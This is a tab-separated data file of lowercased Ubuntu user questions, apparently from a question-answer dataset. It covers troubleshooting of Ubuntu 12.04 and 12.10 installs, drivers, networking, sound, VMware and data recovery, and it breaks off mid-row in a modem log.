204936	how to detect security mode of wifi access point ? ( wep/wpa/wpa2 )	how can i find out what type of security a wireless access point ( essid ) is using ? wep/wpa/wpa2 ( preferably using commandline tools )
204943	installing 12.10 themes ! i ca n't get any to work	i can not seem to get any themes or tweaks to activate or show up in the appearance tab in system settings . i have downloaded gnome tweak tool and compiz through the terminal , but still nothing . i have gnome 3.6 also installed . my question is , when you download a .tar.gz , how do you tell it where to extract to and after it 's extrated , then what do you do ? this is so confusing . i 'm new to ubuntu and anything non windows ... finally broke the spell ... .so far , i am absolutely in love with it , but i need help . thanks
204953	virtualbox dns stopped working on upgrade to 12.10	i have a debian image setup on virtualbox that uses the default nat to access the internet . it was working fine before i upgraded to 12.10 . after i upgraded the dns lookups no longer work . i still can access ip addresses , but this is not a nice solution .
204957	ubuntu 12.10 overheats hp dv6t	12.10 in my hp dv6t-6c00 i 'm worried about the heat ... i followed some advice , and i think that i disabled ati card , that improved the fan activity and reduced the temperature a little bit . but now fan is starting and stopping all the time , according to the jupiter applet , temp goes from 45 degrees to 58-59 ... . ( without any load ) should i worry ? what can i do to solve this ? what is the normal temp ?
204962	unity launcher autohide leaves `` ghost '' behind ?	in 12.04 i had the launcher set to autohide , which worked perfectly . however in 12.10 i am getting a strange `` ghost '' issue . take this screenshot , with me having a maximised google chrome window , mousing over the back button . as well as this , i also get another ghosting issue when i have the panel set with an opacity , whereby whatever is in approximately the middle left of the screen gets mirrored up to to panel , but only when i move/switch to a window . but that one is not so annoying as the autohide bug , how can i fix that ?
204963	cant install ubuntu 12.10 ?	i believe i have tried every trick in the book but ubuntu just wont install . windows has no issue with it . i burned a dvd of ubuntu 12.10 and it has passed all checks , but i keep getting different errors while installing . mainly while `` creating the partition in dev '' and some times during `` copying files '' . the errors are : errno 30 , errno 33 , installer crashed , failed to create partition etc ... i have intel core 2 duo 2.66ghz , 4gb ram and asrock motherboard . i really want to install ubuntu 12.10 and 12.10 only ! also should i prefer 32bit or 64bit ? i have burned a 32bit version . thank you : : : : : : : : : : : : : : : '' '' windows has no issue with it ... . '' '' it installs perfectly no error during installation i do not know about `` md5sum '' it has been checked with the tool in the dvd itself also when i tried to boot it from the usb using lili then also it passes its checks also during installation i get io error and stuff like that written on the command line box during installation but it still proceeds further until i get a dialogue box with an error on it
204968	java development on linux	i need help on how can i install java oracle 7 , netbeans and tomcat on ubuntu platform . i 'm new to ubuntu , totally zero knowledge on ubuntu . i have tried to search for installations but i was confused on how should i install java . pls . help on how can i install java and also set the path , classpath , java_home , catalina_home ? is there any guides about installation and environment variable setup ?
204973	ubuntu 12.4 easytether install	i have copied easytether software to my computer . when i attempt to install , the install button is greyed out and ca n't click on it . please help
204977	how to minimize or maximize windows from the unity panel ?	in the unity panel , when you left-click on an application that has multiple windows or instances open , it displays the spread mode , but when you left-click on a solitary application , it does absolutely nothing . i 'd like to be able to click on a solitary application and have it minimize or maximize , like in a traditional taskbar . is there a way to accomplish that in unity ? i 'm currently running ubuntu 12.10 . thanks .
204979	installing purchased apps by terminal	i 've been trying to reinstall all my purchased apps on a new machine , and i ran into a problem . because of the size of them ( about 10-12gb in total ) and the fact that downloading them is painfully slow for whatever reason ( at most 800kb/s ) , it takes a lot of time ( not to mention usc crashing ) . and then , when i tried to leave them overnight , none of them were installed and everything was at the same spot i left it . is there anyway to install them via terminal ? like some kind of usc backend were i could just add the archives for apps listed as purchased and then install them via apt-get ?
204980	is it possible to remove the launcher entirely , but keep the dash functionality , of unity in 12.10 ?	i have read on this post that it is possible to completely remove the launcher from unity while retaining other features . how can this be done in 12.10 ? the problem is in the fact that 12.10 no longer has a unity 2d session .
204983	keep trying to install always throws error help !	so i was installing 12.10 on my asus g74sx laptop ... did everything the tutorial told me to do yet i keep getting an error saying that there was an error of input/output.. that i should check the hard drive and see if it needs replacement . i tried with 2 dvds and did format twice my usb to fat 32 and mounted the image file for 12.10 ... no idea what is going on . please help ! mmm i can not add an image ... i 'll comment with the link to the error !
204984	photo management on remote server	i am trying to find a way to manage and organize the photos on my nas . i am using freenas and have a folder with all of my photos in it . i want to be able to manage and organize those photos and find them but ca n't seem to add that folder to any of the photo managers i have found . i have used digikam , kphoto , fspot and have made no progress . i have followed several threads to mount that drive using fuse and autofs but when i go to use that folder as the main place for my photos in the software setup for the photo managers it does n't connect . says it ca n't find that file location and then asks me if i want to create it . please help . using ubuntu 12.04
204986	problem when upgrading from ubuntu 12.04 to 12.10	while upgrading from 12.04 to 12.10 , after completion of downloading packages , installation of packages was going on.due to power cut , it was inevitable to me shutting my computer down . hence , the next steps of installing , cleaning and restarting could not be completed . the next time i logged in , i could see only a black screen . please guide me to retrieve my ubuntu . ( for your kind information , though i am a ubuntu lover , not a technically strong person )
204987	how to set up e-uae amiga emulator ?	i always get nostalgic thinking about my good old amiga 500 days and the many games i enjoyed playing on it . i ran the amiga emulator winuae before on a windows machine , but i have now switched to ubuntu and wanted to give uae a try on my new linux platform as well . so my question is : how can i install e-uae on ubuntu 12.04 ( precise pangolin ) ?
205006	failed to get the adb version	while running sample android project getting this error on eclipse.. project cleaned 2-3 times but still getting error . [ 2012-10-23 10:39:24 - adb ] failed to get the adb version : can not run program '' /home/rahul/android-sdks/platform-tools/adb '' : error=13 , permission denied from '/home/rahul/android-sdks/platform-tools/adb ' - exists=true
205008	i could n't get 2 nics working together	i 've got an ubuntu 10.04 server with this configuration : eth0 : 192.168.10.xxx mask 255.255.255.0 gw 192.168.10.254 eth1 : 192.168.0.xxx mask 255.255.255.0 gw 192.168.0.3 eth0 is used for incoming and outgoing trafic ( internal webserver ) eth1 i want to use for accessing the network : 192.168.51.0/24 by gateway 192.168.0.1 when eth1 is down , the webserver is reachable . when i want to bring the state of eth1 to up , i use the following commands : $ sudo su # ifconfig eth1 up # route add -net 192.168.51.0 netmask 255.255.255.0 gw 192.168.0.1 # ping 192.168.51.xxx [ i 've got contact ] # ip route add default via 192.168.10.254 # ping 192.168.51.xxx [ i 've got contact ] but when i want to access the webserver , i ca n't get contact . can someone please give me some advice so the network .51 and the webserver ( network .10 ) is reachable ? ifconfig # ifconfig eth0 link encap : ethernet hwaddr mymac inet addr:192.168.10.2 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fee0:39c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:23207 errors:0 dropped:0 overruns:0 frame:0 tx packets:24924 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2683656 ( 2.6 mb ) tx bytes:12841148 ( 12.8 mb ) eth0:1 link encap : ethernet hwaddr mymac inet addr:192.168.10.10 bcast:192.168.10.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 eth1 link encap : ethernet hwaddr mymac inet addr:192.168.0.237 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fee0:3a6/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3742 errors:0 dropped:0 overruns:0 frame:0 tx packets:143 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:318099 ( 318.0 kb ) tx bytes:12994 ( 12.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3175 errors:0 dropped:0 overruns:0 frame:0 tx packets:3175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:221390 ( 221.3 kb ) tx bytes:221390 ( 221.3 kb ) route -n # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 192.168.51.0 192.168.0.1 255.255.255.0 ug 0 0 0 eth1 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 192.168.10.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 0.0.0.0 192.168.10.254 0.0.0.0 ug 0 0 0 eth0 0.0.0.0 192.168.10.254 0.0.0.0 ug 100 0 0 eth0 0.0.0.0 192.168.10.254 0.0.0.0 ug 100 0 0 eth0 /etc/network/interfaces # cat /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.10.2 netmask 255.255.255.0 gateway 192.168.10.254 # a second ip address for ssl auto eth0:1 iface eth0:1 inet static address 192.168.10.10 netmask 255.255.255.0 gateway 192.168.10.254 auto eth1 iface eth1 inet static address 192.168.0.237 netmask 255.255.255.0 gateway 192.168.0.3 post-up route add -net 192.168.51.0 netmask 255.255.255.0 gw 192.168.0.1
205009	recognize date in libre calc	i imported a column with dates in my sheet . the are of the form yyyymmdd . thus 20121023 , 20121022 etc . i want to apply date related functions on this column , but for libre office these fields are just numbers . how can i make libre office recognize them as dates ?
205010	lxdm wo n't login to ubuntu 2d or gnome classic	i installed ubuntu 11.10 on an old dell centrino/512mb machine that was running too slow with windows to be useful . i am completely new to linux and muddling my way through as well as i can . the machine still runs pretty slow on ubuntu . so i loaded the gnome shell and the classic ( no effects ) runs fairly well . everything seemed to be fine up until this . but still not as fast as i 'd like . i read that lubuntu is even lighter , so i installed lubuntu-desktop . it still defaulted to the `` ubuntu login '' or as i came to discover it 's called , lightdm . i changed this to lxdm . once i did that i suddenly could not login to ubuntu 2d or gnome classic ( there are a few other options added when i installed lubuntu-desktop that i also ca n't login to but i do n't even know what these are ) . when i try to login to ubuntu 2d or gnome classic from lxdm it looks like it will load and then returns to the user prompt . i can still login to lubuntu and others ( oddly i can login to ubuntu , and even more oddly ubuntu shows up twice on the list ) . i can also switch back to lightdm and login to everything . i suppose i could just leave it on lightdm , but for lightness ' sake as well as consistency , lxdm is nice . and more i just feel like it should work so i 'd like to get to the source of the problem . i looked extensively for answers . the closest i found is an issue for people upgrading from ubuntu 11.04 to 11.10 and getting returned to the login screen . in that case it was the .xauthority file being taken over by root ( i 'm probably saying this wrong ) . it seemed to be fixed by deleting the .xauthority file . but since i 'm not convinced mine is the same problem i do n't want to just start deleting files , the purpose of which i do n't even understand . i also found one other post on here with a very similar question , but with no answer . any suggestions are appreciated . thanks .
205016	sound problem in ubuntu 12.10	i upgraded ubuntu 12.04 to 12.10 the day before yesterday and am using it till now.the weird thing is that only the startup sound comes when i log in , then comes silence . i tested both digital output ( s/pdif ) and the speakers in the sound settings but can hear nothing . i also tried any help ?
205017	how to define the range of ips using dhcp ?	i am new to installing ubuntu 12.10 maas . i want to set up a dhcp server to define the range of ips for clients . i am not able to do this on 12.10 while on 12.04 this was simple to perform . please if anybody knows , tell me what to do to set up dhcp . thanks in advance .
205021	how to solve `` gpu lockup - switching to software fbcon '' on new install of 12.10-desktop-amd64	error occurs during startup of ubuntu installation . sometimes i 'll get to the welcome screen just like this , the screen will just glitch out , or will simply freeze during the loading icon . nvidia gts 250 intel core i7 920 9 gb memory i was able to install 12.04.1 , but after performing upgrade to 12.10 it get the same problem on startup ; glitches in graphics , missing content etc . also noticed after the upgrade , i 'm no longer able to connect to internet ; neither ethernet or wifi .
205023	how to fix 'error : glib > = 2.28 is required ' when compiling linux-nfc on ubuntu 10.04 ?	i try to compiled linux-nfc code , and running its configure file , but i get an error : configure : error : glib > = 2.28 is required i try to update the glib with apt-get install libglib2.0-0 libglib2.0-dev , but i get a message said my glib version is the newest . so i do n't know how to update glib to 2.28 . my ubuntu version is 10.04 .
205029	xubuntu crashed and it wo n't startup graphically anymore	i was running a normal xubuntu session and suddenly , i could n't launch firefox anymore - a dialog informed that the application crashed . so i restarted the computer , but since then xubuntu does n't start up graphically anymore - all i get is a terminal session . i can switch to other ttys with ctrl + alt f1..f6 , but the 'main ' one is a terminal session too . not the first time i 've encountered this issue - last time i did gave up and reinstalled my system . what could be going on ? how to fix it ?
205031	how do i change the gmail webapp account ?	i entered in my gmail account and the webapp prompted in firefox . i accepted and now , i want to change the gmail webapp account , but there is no option and , inside the `` online accounts '' from system config , there is no gmail configuration . could you tell me how to change account or delete them ?
205034	can not access windows 7 ntfs /users/username all other directories are ok	a friends hdd is having some major issues and i am trying to recover data . windows will blue screen due to the hdd failure , even using another pc with windows installed the diskmanagement tool hangs when the drive is connected until such time it determines the drive to be blank and require formatting . the hdd is having many read/io errors and making some clicking noises during these errors . i have tried instead to access it in ubuntu as i have in the past in such situation as ubuntu does many things windows cant . i have allowed ubuntu to auto mount the drive but im having issues accessing a windows 7 created partition 's user directory . i can navagate the directory structure without issue until i try /users/username ( equivilent in windows `` c : \users\username '' ) . when i do the window manager freezes for 10-30 secconds then returns a blank directory . under the assumption this is a permissions issue as its a users home directory i reverted to using dd with noerror to duplicate the data to another hard drive so i can mount that in windows to try again . the issue is this drive is 750gb and the ammount of io errors slowing the process means it is running at 2.2mb/s and dropping . ( its been running since 10am ( now 4pm ) and has completed 23 gb ... ) . does anyone have some information that may be useful in this situation as it is time sensitive and the data required from the drive is assignment work for a corse due imminently . i have checked for issues relating to ntfs permissions and mounting methods but i can rw to other directories so i assume the mounting method is not the issue . i am unsure if this issue related to folder ownership in windows ? thanks .
205035	how to add a splash image in grub2 ?	how do i add a splash image in grub2 on ubuntu 12.10 ?
205039	when using fglrx unity does not display and slow moving windows	two issues when using the fglrx driver : when i move to the propriety fglrx driver , unity does not load the side bar . the login screen loads ( with top bar displayed ) , but when logging in , the unity side bar does not load . i can right click the desktop and create new folders . i can ctrl+alt+delete and manage to get to system settings ( where i can change back to open source driver ) . any ideas ? other issue : when using the fglrx , when i open a panel say system settings ) , and move the panel , it lags , it moves at like 2 fps , instead of being a smooth move such as when using the open source driver . any ideas ? specs : i3 4gb ram radeon 5770 hd 512mb gpu ( sapphire ) 250 gb sata gigabyte h55m mobo .
205050	attachments missing in evolution since 12.10 upgrade	so i upgraded to 12.10 few days ago and now i can not access attachments in my e-mails any more ( on top of the bug that stops me from sending attachments larger than a certain size ) . any idea how i can fix the problem ? the attachments used to be under the expandable from -field in the middle of the screen .
205051	how to configure proxy for online account authentication	when i try to register a new online account the authentication screen just hangs and finally ends in `` an error occured while loading the authenication page '' . i have tried to do this both at work ( where it hangs ) and at home , where it works perfectly . the difference is that at work we have a proxy . i have tried to configure the proxy in the system and `` apply system wide '' but the authentication still hangs on 'loading ' animation . so the question is , how do i configure a proxy for the authentication in online accounts dialog ?
205053	prevent gnome from bounding windows	i 'm using gnome classic and it tends to move windows to the edge of screen without my will . i ca n't leave a window partially off-screen ( it moves into the screen once i 've switched to another app ) sometimes nautilus window placed in center of the screen moves down to the edge of the screen again and again . where is the magic checkbox to stop that ? update . the problem is in compiz plugin `` place windows '' . is there any replacements for that plugin ? i want new windows to appear in screen center - that 's all what i need from that plugin .
205054	ubuntu 12.10 does n't work after update	12.10 does n't work after a partial distribution update . i had some trouble before i began the update , and the partial update thingy appeared . it took about 6 hours to update/upgrade , do n't know why . after the update , i restarted the laptop and nautilus does n't appear nor does unity . i ca n't switch to gnome or anything else to try and fix it . the resolution is weird ( does n't fill out the right side of the screen ) . i 'm almost sure it 's compiz who 's the sinner ( or me . ) but i need help to get everything working again . internet connections is fine . i have tried sudo apt-get install -f and sudo apt-get upgrade and so on .
205055	audio not working in 12.10	i did a clean install of 12.10 . when i open sound settings in gnome the only device in the list is `` dummy output '' , and sound is not working . sound worked fine out of the box in 12.04 . i ran alsamixer , it says my card is `` hda intel '' , and chip is `` realtek alc880 '' . the alsamixer playback output was set to mute at first , unmuting did not fix . i checked out the info at unixmen as suggested on a similar question ; i 've done everything there except installing the ubuntu audio dev team driver . should i try install this ? edit : i 've been reading the sound troubleshooting guide . it looks like ubuntu is finding my audio device correctly . mike @ wucade : ~ $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) subsystem : albatron corp. device 2668 flags : bus master , fast devsel , latency 0 , irq 40 memory at d01c0000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel still stuck as to why this is n't working .
205060	how can i set panel to bottom , after installing mate 1.4 ?	how can i move the ubuntu 12.10 top panel to bottom , after installing mate 1.4 ? how can i do that after removing it from top ?
205061	mouse clicking when removing finger	i have an annoying problem . whenever i use the mouse , when i remove my finger , the cursor have some sort of timer , and it clicks after a few seconds . when i remove my finger , the cursor gets orange , and after some time , it clicks . how can i turn this feature off ? i have tried fooling around in both systems settings and the gpoint app . anyone have a solution ? thanks !
205063	command to get the hostname of remote server using ip address	i want to get the hostname of a remote server using the ip address using my ubuntu . in windows we can get using nbtstat but this does n't work in linux . does anyone know how to do that ?
205079	how to enlarge ubuntu partition	i installed ubuntu 11.10 recently by making a 5.6gb partition from the ubiquity installer . i wanted to upgrade to 12.04 , so i opened the update manager and clicked on 'update packages ' ( i was following this guide ) after clicking , it said that there was too little space available . so , i want to enlarge my ubuntu partition so that there is appropriate space for upgrading . i downloaded gparted . i read another guide which said my computer wo n't boot if i resize the ubuntu partition because '/boot will be misplaced and i will have to repair grub2 myself . ' so how do i do this easily ? thank you in advance .
205080	how to get wifi working on ubuntu ?	i am new to linux . just installed ubuntu 12.10 . i can get a wired internet connection but can not get a wireless connection . can anybody help ?
205086	what should look like example network configuration for maas/juju ?	i have still problem with configuring maas/juju . and i want to know what is best configuration ( simplest ) for maas/juju ? if someone have graphic of it i will be happy .
205089	how can i mount multiple iso ?	i have multiple iso files , actually two . i use furius iso mount . can i mount multiple iso files in a single image with this tool or another under ubuntu 12.04 ? and how can i do it ? edit : i need to system see the full dvd . this is the main task . i hope this clarification makes clear the meaning of my question .
205091	laptop has no wifi connection on boot , also disconnects when suspending	i just got a new laptop , an asus ultrabook , and installed 12.10 on it . the installation went smoothly with no errors . the one issue is that wifi is not enabled by default when i boot . i have to manually enable it after logging in by clicking on the icon in the gnome panel and selecting `` enable wireless '' . also , if ever the laptop goes into suspend mode , when it comes back , the wifi is disconnected . after a search on the web , it seems that the problem should be solved by editing the connections , and ensuring that for every wireless connection the `` connect automatically '' and `` available to all users '' checkboxes are checked . i have done this , but it has not changed anything . i would like the wifi to always be connected by default , when booting or any other time . how can i get this to happen ? to be clear , i am connecting to a wireless lan connection , sometimes on my home connection , and sometimes at a hotspot . this is not a 3g or cellular service connection .
205093	ubuntu 12.10 upgrade stopped halfway through	while upgrading from 12.04 to 12.10 the upgrade crashed while installing the upgrades . it stopped while `` configuring python3-aptdaemon.gtk3widgets '' and the terminal says flashplugin-installer : downloading then shows the url for the flash plugin that its downloading . i think it stopped working because my internet connection is a bit patchy , and it probably failed while downloading the installer , but what can i do to make it get going again ?
205105	how to make my newly created secondary partition accessible ?	i have decided to reinstall my lubuntu os and to split on the occasion my partition so as to have a secondary one where long-time files would be stored . i guess what i wanted followed a logic that was close to my experience as ex-windows user . i just wanted a new non-system partition visible in the left side pane of the file browser . when trying to install the system onto the smaller partition for which i set / as mount point , i was prompted to set a different mount point for the other : i had already used / for the one that was not meant to be the system partition because i did n't new what / meant . not knowing what to do i selected /boot for the second and went on installing on the smaller one with mount point / . all was ok except that now the larger/secondary ( /boot mount point ) partition is not visible as i expected it to be . but this does n't mean that it is completely hidden or unaccessible . i found that /boot is in fact the location for this partition : when i go there i see i 'm within the 30gb/second partition . creating a folder there and adding that folder to side pane ( create shortcut ) in thunar , makes in a way that partition immediately visible and accessible in file manager 's side pane the way i wanted to . but this is still not a solution , for i can not access it as a partition ( unmount it , etc ) in gparted it is :
205108	how to fix vmware workstation 9 installation on ubuntu 12.10 ?	i have opened this thread because i upgraded to ubuntu 12.10 beta ( kernel 3.5 ) and i have a problem with vmware workstation 9 : unable to change virtual machine power state : can not find a valid peer process to connect to does anyone have the same problem ? this is a clean install of ubuntu 12.10 ( daily build ) . i installed vmware 9 and patched but it 's not working . i ca n't patch correctly and get the things to build correctly . my laptop is a lenovo t420 with nvidia optimus technology . this message is shown when i try to apply the patch : stopping vmware services : vmware authentication daemon done at least one instance of vmware vmx is still running . please stop all running instances of vmware vmx first . vmware authentication daemon done unable to stop services how can i stop the vmware services to apply the patch ? this message is shown when i try to patch again : ./patch-modules_3.5.0.sh /usr/lib/vmware/modules/source/.patched found . you have already patched your sources . exiting but vmware is not working , and i canât uninstall .
205112	how do i get amd/intel hybrid graphics drivers to work ?	on ubuntu 12.04 my sony vaio vpcse with intelâž hd graphics 3000 and amd radeonâ˘ hd 6630m worked fine with the catalyst control center version 12.6 . also the switching between integrated and discrete graphic card was working . in both cases , i followed this tutorial . but it is not working on ubuntu 12.10 . i tested the tutorial with the catalyst control center from the ubuntu software center , the version 12.8 and version 12.9 . always the same problem : after installation process i am able to boot in the login-screen . but after entering the password for my username , only the background-image appears . unity seems not to be starting . i am only able to reach the context-menu by right clicking the mouse button . i also tried his fix , but is also does not work for me . any ideas what to do to fix this problem ? update : same problem on ubuntu 13.04 ! update : solution for 13.04 ist not working on ubuntu 13.10 !
205113	after juju deploy : [ errno 2 ] no such file or directory	i get this after juju deploy . hsf @ ubuntuserver : ~ $ juju deploy wordpress 2012-10-23 13:12:15,663 info searching for charm cs : precise/wordpress in charm store [ errno 2 ] no such file or directory : '/home/hsf/.juju/cache/downloads/cs_3a_precise_2f_wordpress-9.charmglg7si.part' 2012-10-23 13:12:16,075 error [ errno 2 ] no such file or directory : '/home/hsf/.juju/cache/downloads/cs_3a_precise_2f_wordpress-9.charmglg7si.part' i am using ubuntu 12.04 server .
205119	keyboard indicator shows red x	before upgrade to 12.10 , i had ~/.icons/flags shown . after the upgrade , even if the folder exists and dconf is set to use flags instead of text , the flags do n't show . the problem is that i can not change to text to show the languages . even though on logon the language en is shown , when i log to unity the red x comes to its place . please help , it 's a rather frustrating situation ...
205121	can not login to any ttys - wrong password	i am new to ubuntu ( 12.10 with unity desktop ) and linux for that part too , so i might not be asking the right question . but here goes . i go to tty1 by pressing keys ctrl + alt + f1 , where i am asked to enter username and password , which i do , but i get the message `` login incorrect '' . in my log file /var/log/auth.log this entry has been made : oct 23 13:17:45 somename login [ 3361 ] : failed login ( 1 ) on 'dev/tty1 ' for 'auser ' , authentication failure i do not have the wrong username or password . it is the same username/password i use to log in when unity starts . so how came i ca n't log in to tty1 ?
205124	is there any finished tutorial on how to develop and package unity web apps ?	i want to create unity web-app for my new website.so , is there any up to the mark tutorial.i 've read ubuntu 's official tutorial on this topic but that is not even complete.i 've developed the code but do n't know how to package the code
205131	neverwinter nights does not run in 12.10	i recently installed a fresh version of ubuntu 12.10 on my notebook . then i copied the backup copy of my neverwinter nights folder from my old 12.04 install on the same computer to the new installation and tried to start the game . the terminal prompt disappears and top shows some low activity on nwmain , but there is neither showing up the game graphics nor plays any music . any suggestions how to fix it ? the game runs fine using the same setup expect for running on 12.04 . btw . i set up a virtual box with ubuntu 12.04 on my notebook and use a copy of my neverwinter nights installation from the host ( ubuntu 12.10 ) to start the game . it works , i can play it under 12.04 64bit ubuntu in my virtualbox . kind regards and thanks in advance
205132	ubuntu 12.10 failed to create a file system error	i would like to install ubuntu 12.10 on my system but i am getting an error `` the ext4 file system creation in partition # 1 of scsi3 ( 0,0,0 ) ( sda ) failed `` ' please help ! ! during installation i select `` erase and install ubuntu option '' . my s.m.a.r.t . in the bios in enabled , the other options are disabled and auto . please help my pc is dead for a week .
205135	while installing ubuntu 12.04 lts , the boot file could not be installed . what do i do ?	i burned a copy of ubuntu 12.04 onto a cd-r , and while installing it , i came across an error message that said a file could not be installed . i do not remember what it was called , but the system can not boot up without it . after retrying , i finished the installation without the file . any help much appreciated .
205137	unity 3d does n't work on ubuntu 12.04 lts in virtual box hosted by windows 7 64bit	ca n't google out the solution through some time so i 'm asking here . i have installed linux ubuntu 12.04 lts in virtual box hosted by windows 7 64bit simple > > > my 3d stopped working after some kernel headers update < < < few months ago . just like that . i do n't member which version was it . in meantime there was 2 or 3 new releases of virtualbox which i have installed . every time i am updating virtualbox guest additions to the newest version . my 3d in ubuntu still does n't work . root @ pjadmin-virtualbox : ~ # /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.2 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no my graphics card in pc is ati 6850 . please help .
205138	error in updating the system	whenevr i try sudo apt-get update in the terminal it throws the following error : - err http : //archive.canonical.com precise inrelease err http : //archive.canonical.com precise release.gpg unable to connect to 111.125.139.199:8105 : err http : //archive.ubuntu.com precise inrelease err http : //archive.ubuntu.com precise release.gpg unable to connect to 111.125.139.199:8105 : reading package lists ... done w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/release.gpg unable to connect to 111.125.139.199:8105 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/release.gpg unable to connect to 111.125.139.199:8105 : w : some index files failed to download . they have been ignored , or old ones used instead . following problems are also arising , may be due to same issue : - gerrit push not working , printer add button not enabled , apt-get install not working , unable to fetch git from eclipse , contents of /etc/apt/sources.list : - # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main
205139	how to install huawei mobile broadband ec306 ?	how to install huawei mobile broadband ec 306 evdo revb in ubuntu 12.04 lts 64bit ? best regards excuses me for my bad english when i connect the modem on ubuntu , it fails to mount system and furthermore it is not recognized as a cd-rom . i is not installed windows on my computer , but i try to open the modem under windows on a pc friend , there is no script file called `` linux '' , but only windows . lsusbâ : serviteur @ creation : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 15d9:0a4c trust international b.v. usb+ps/2 optical mouse bus 001 device 007 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard dmesg q : 0 ansi : 2 [ 16619.060771 ] sr1 : scsi-1 drive [ 16619.060955 ] sr 13:0:0:0 : attached scsi cd-rom sr1 [ 16619.061099 ] sr 13:0:0:0 : attached scsi generic sg3 type 5 [ 16619.061358 ] sd 14:0:0:0 : attached scsi generic sg4 type 0 [ 16619.063654 ] sd 14:0:0:0 : [ sdc ] attached scsi removable disk [ 16634.224923 ] usb 1-6 : usb disconnect , device number 6 [ 16638.468041 ] usb 1-6 : new high-speed usb device number 7 using ehci_hcd [ 16638.586210 ] option 1-6:1.0 : gsm modem ( 1-port ) converter detected [ 16638.586316 ] usb 1-6 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 16638.586435 ] option 1-6:1.1 : gsm modem ( 1-port ) converter detected [ 16638.586517 ] usb 1-6 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 16638.586607 ] option 1-6:1.2 : gsm modem ( 1-port ) converter detected [ 16638.586676 ] usb 1-6 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 16638.586752 ] option 1-6:1.3 : gsm modem ( 1-port ) converter detected [ 16638.586828 ] usb 1-6 : gsm modem ( 1-port ) converter now attached to ttyusb3 [ 16638.586929 ] option 1-6:1.4 : gsm modem ( 1-port ) converter detected [ 16638.586997 ] 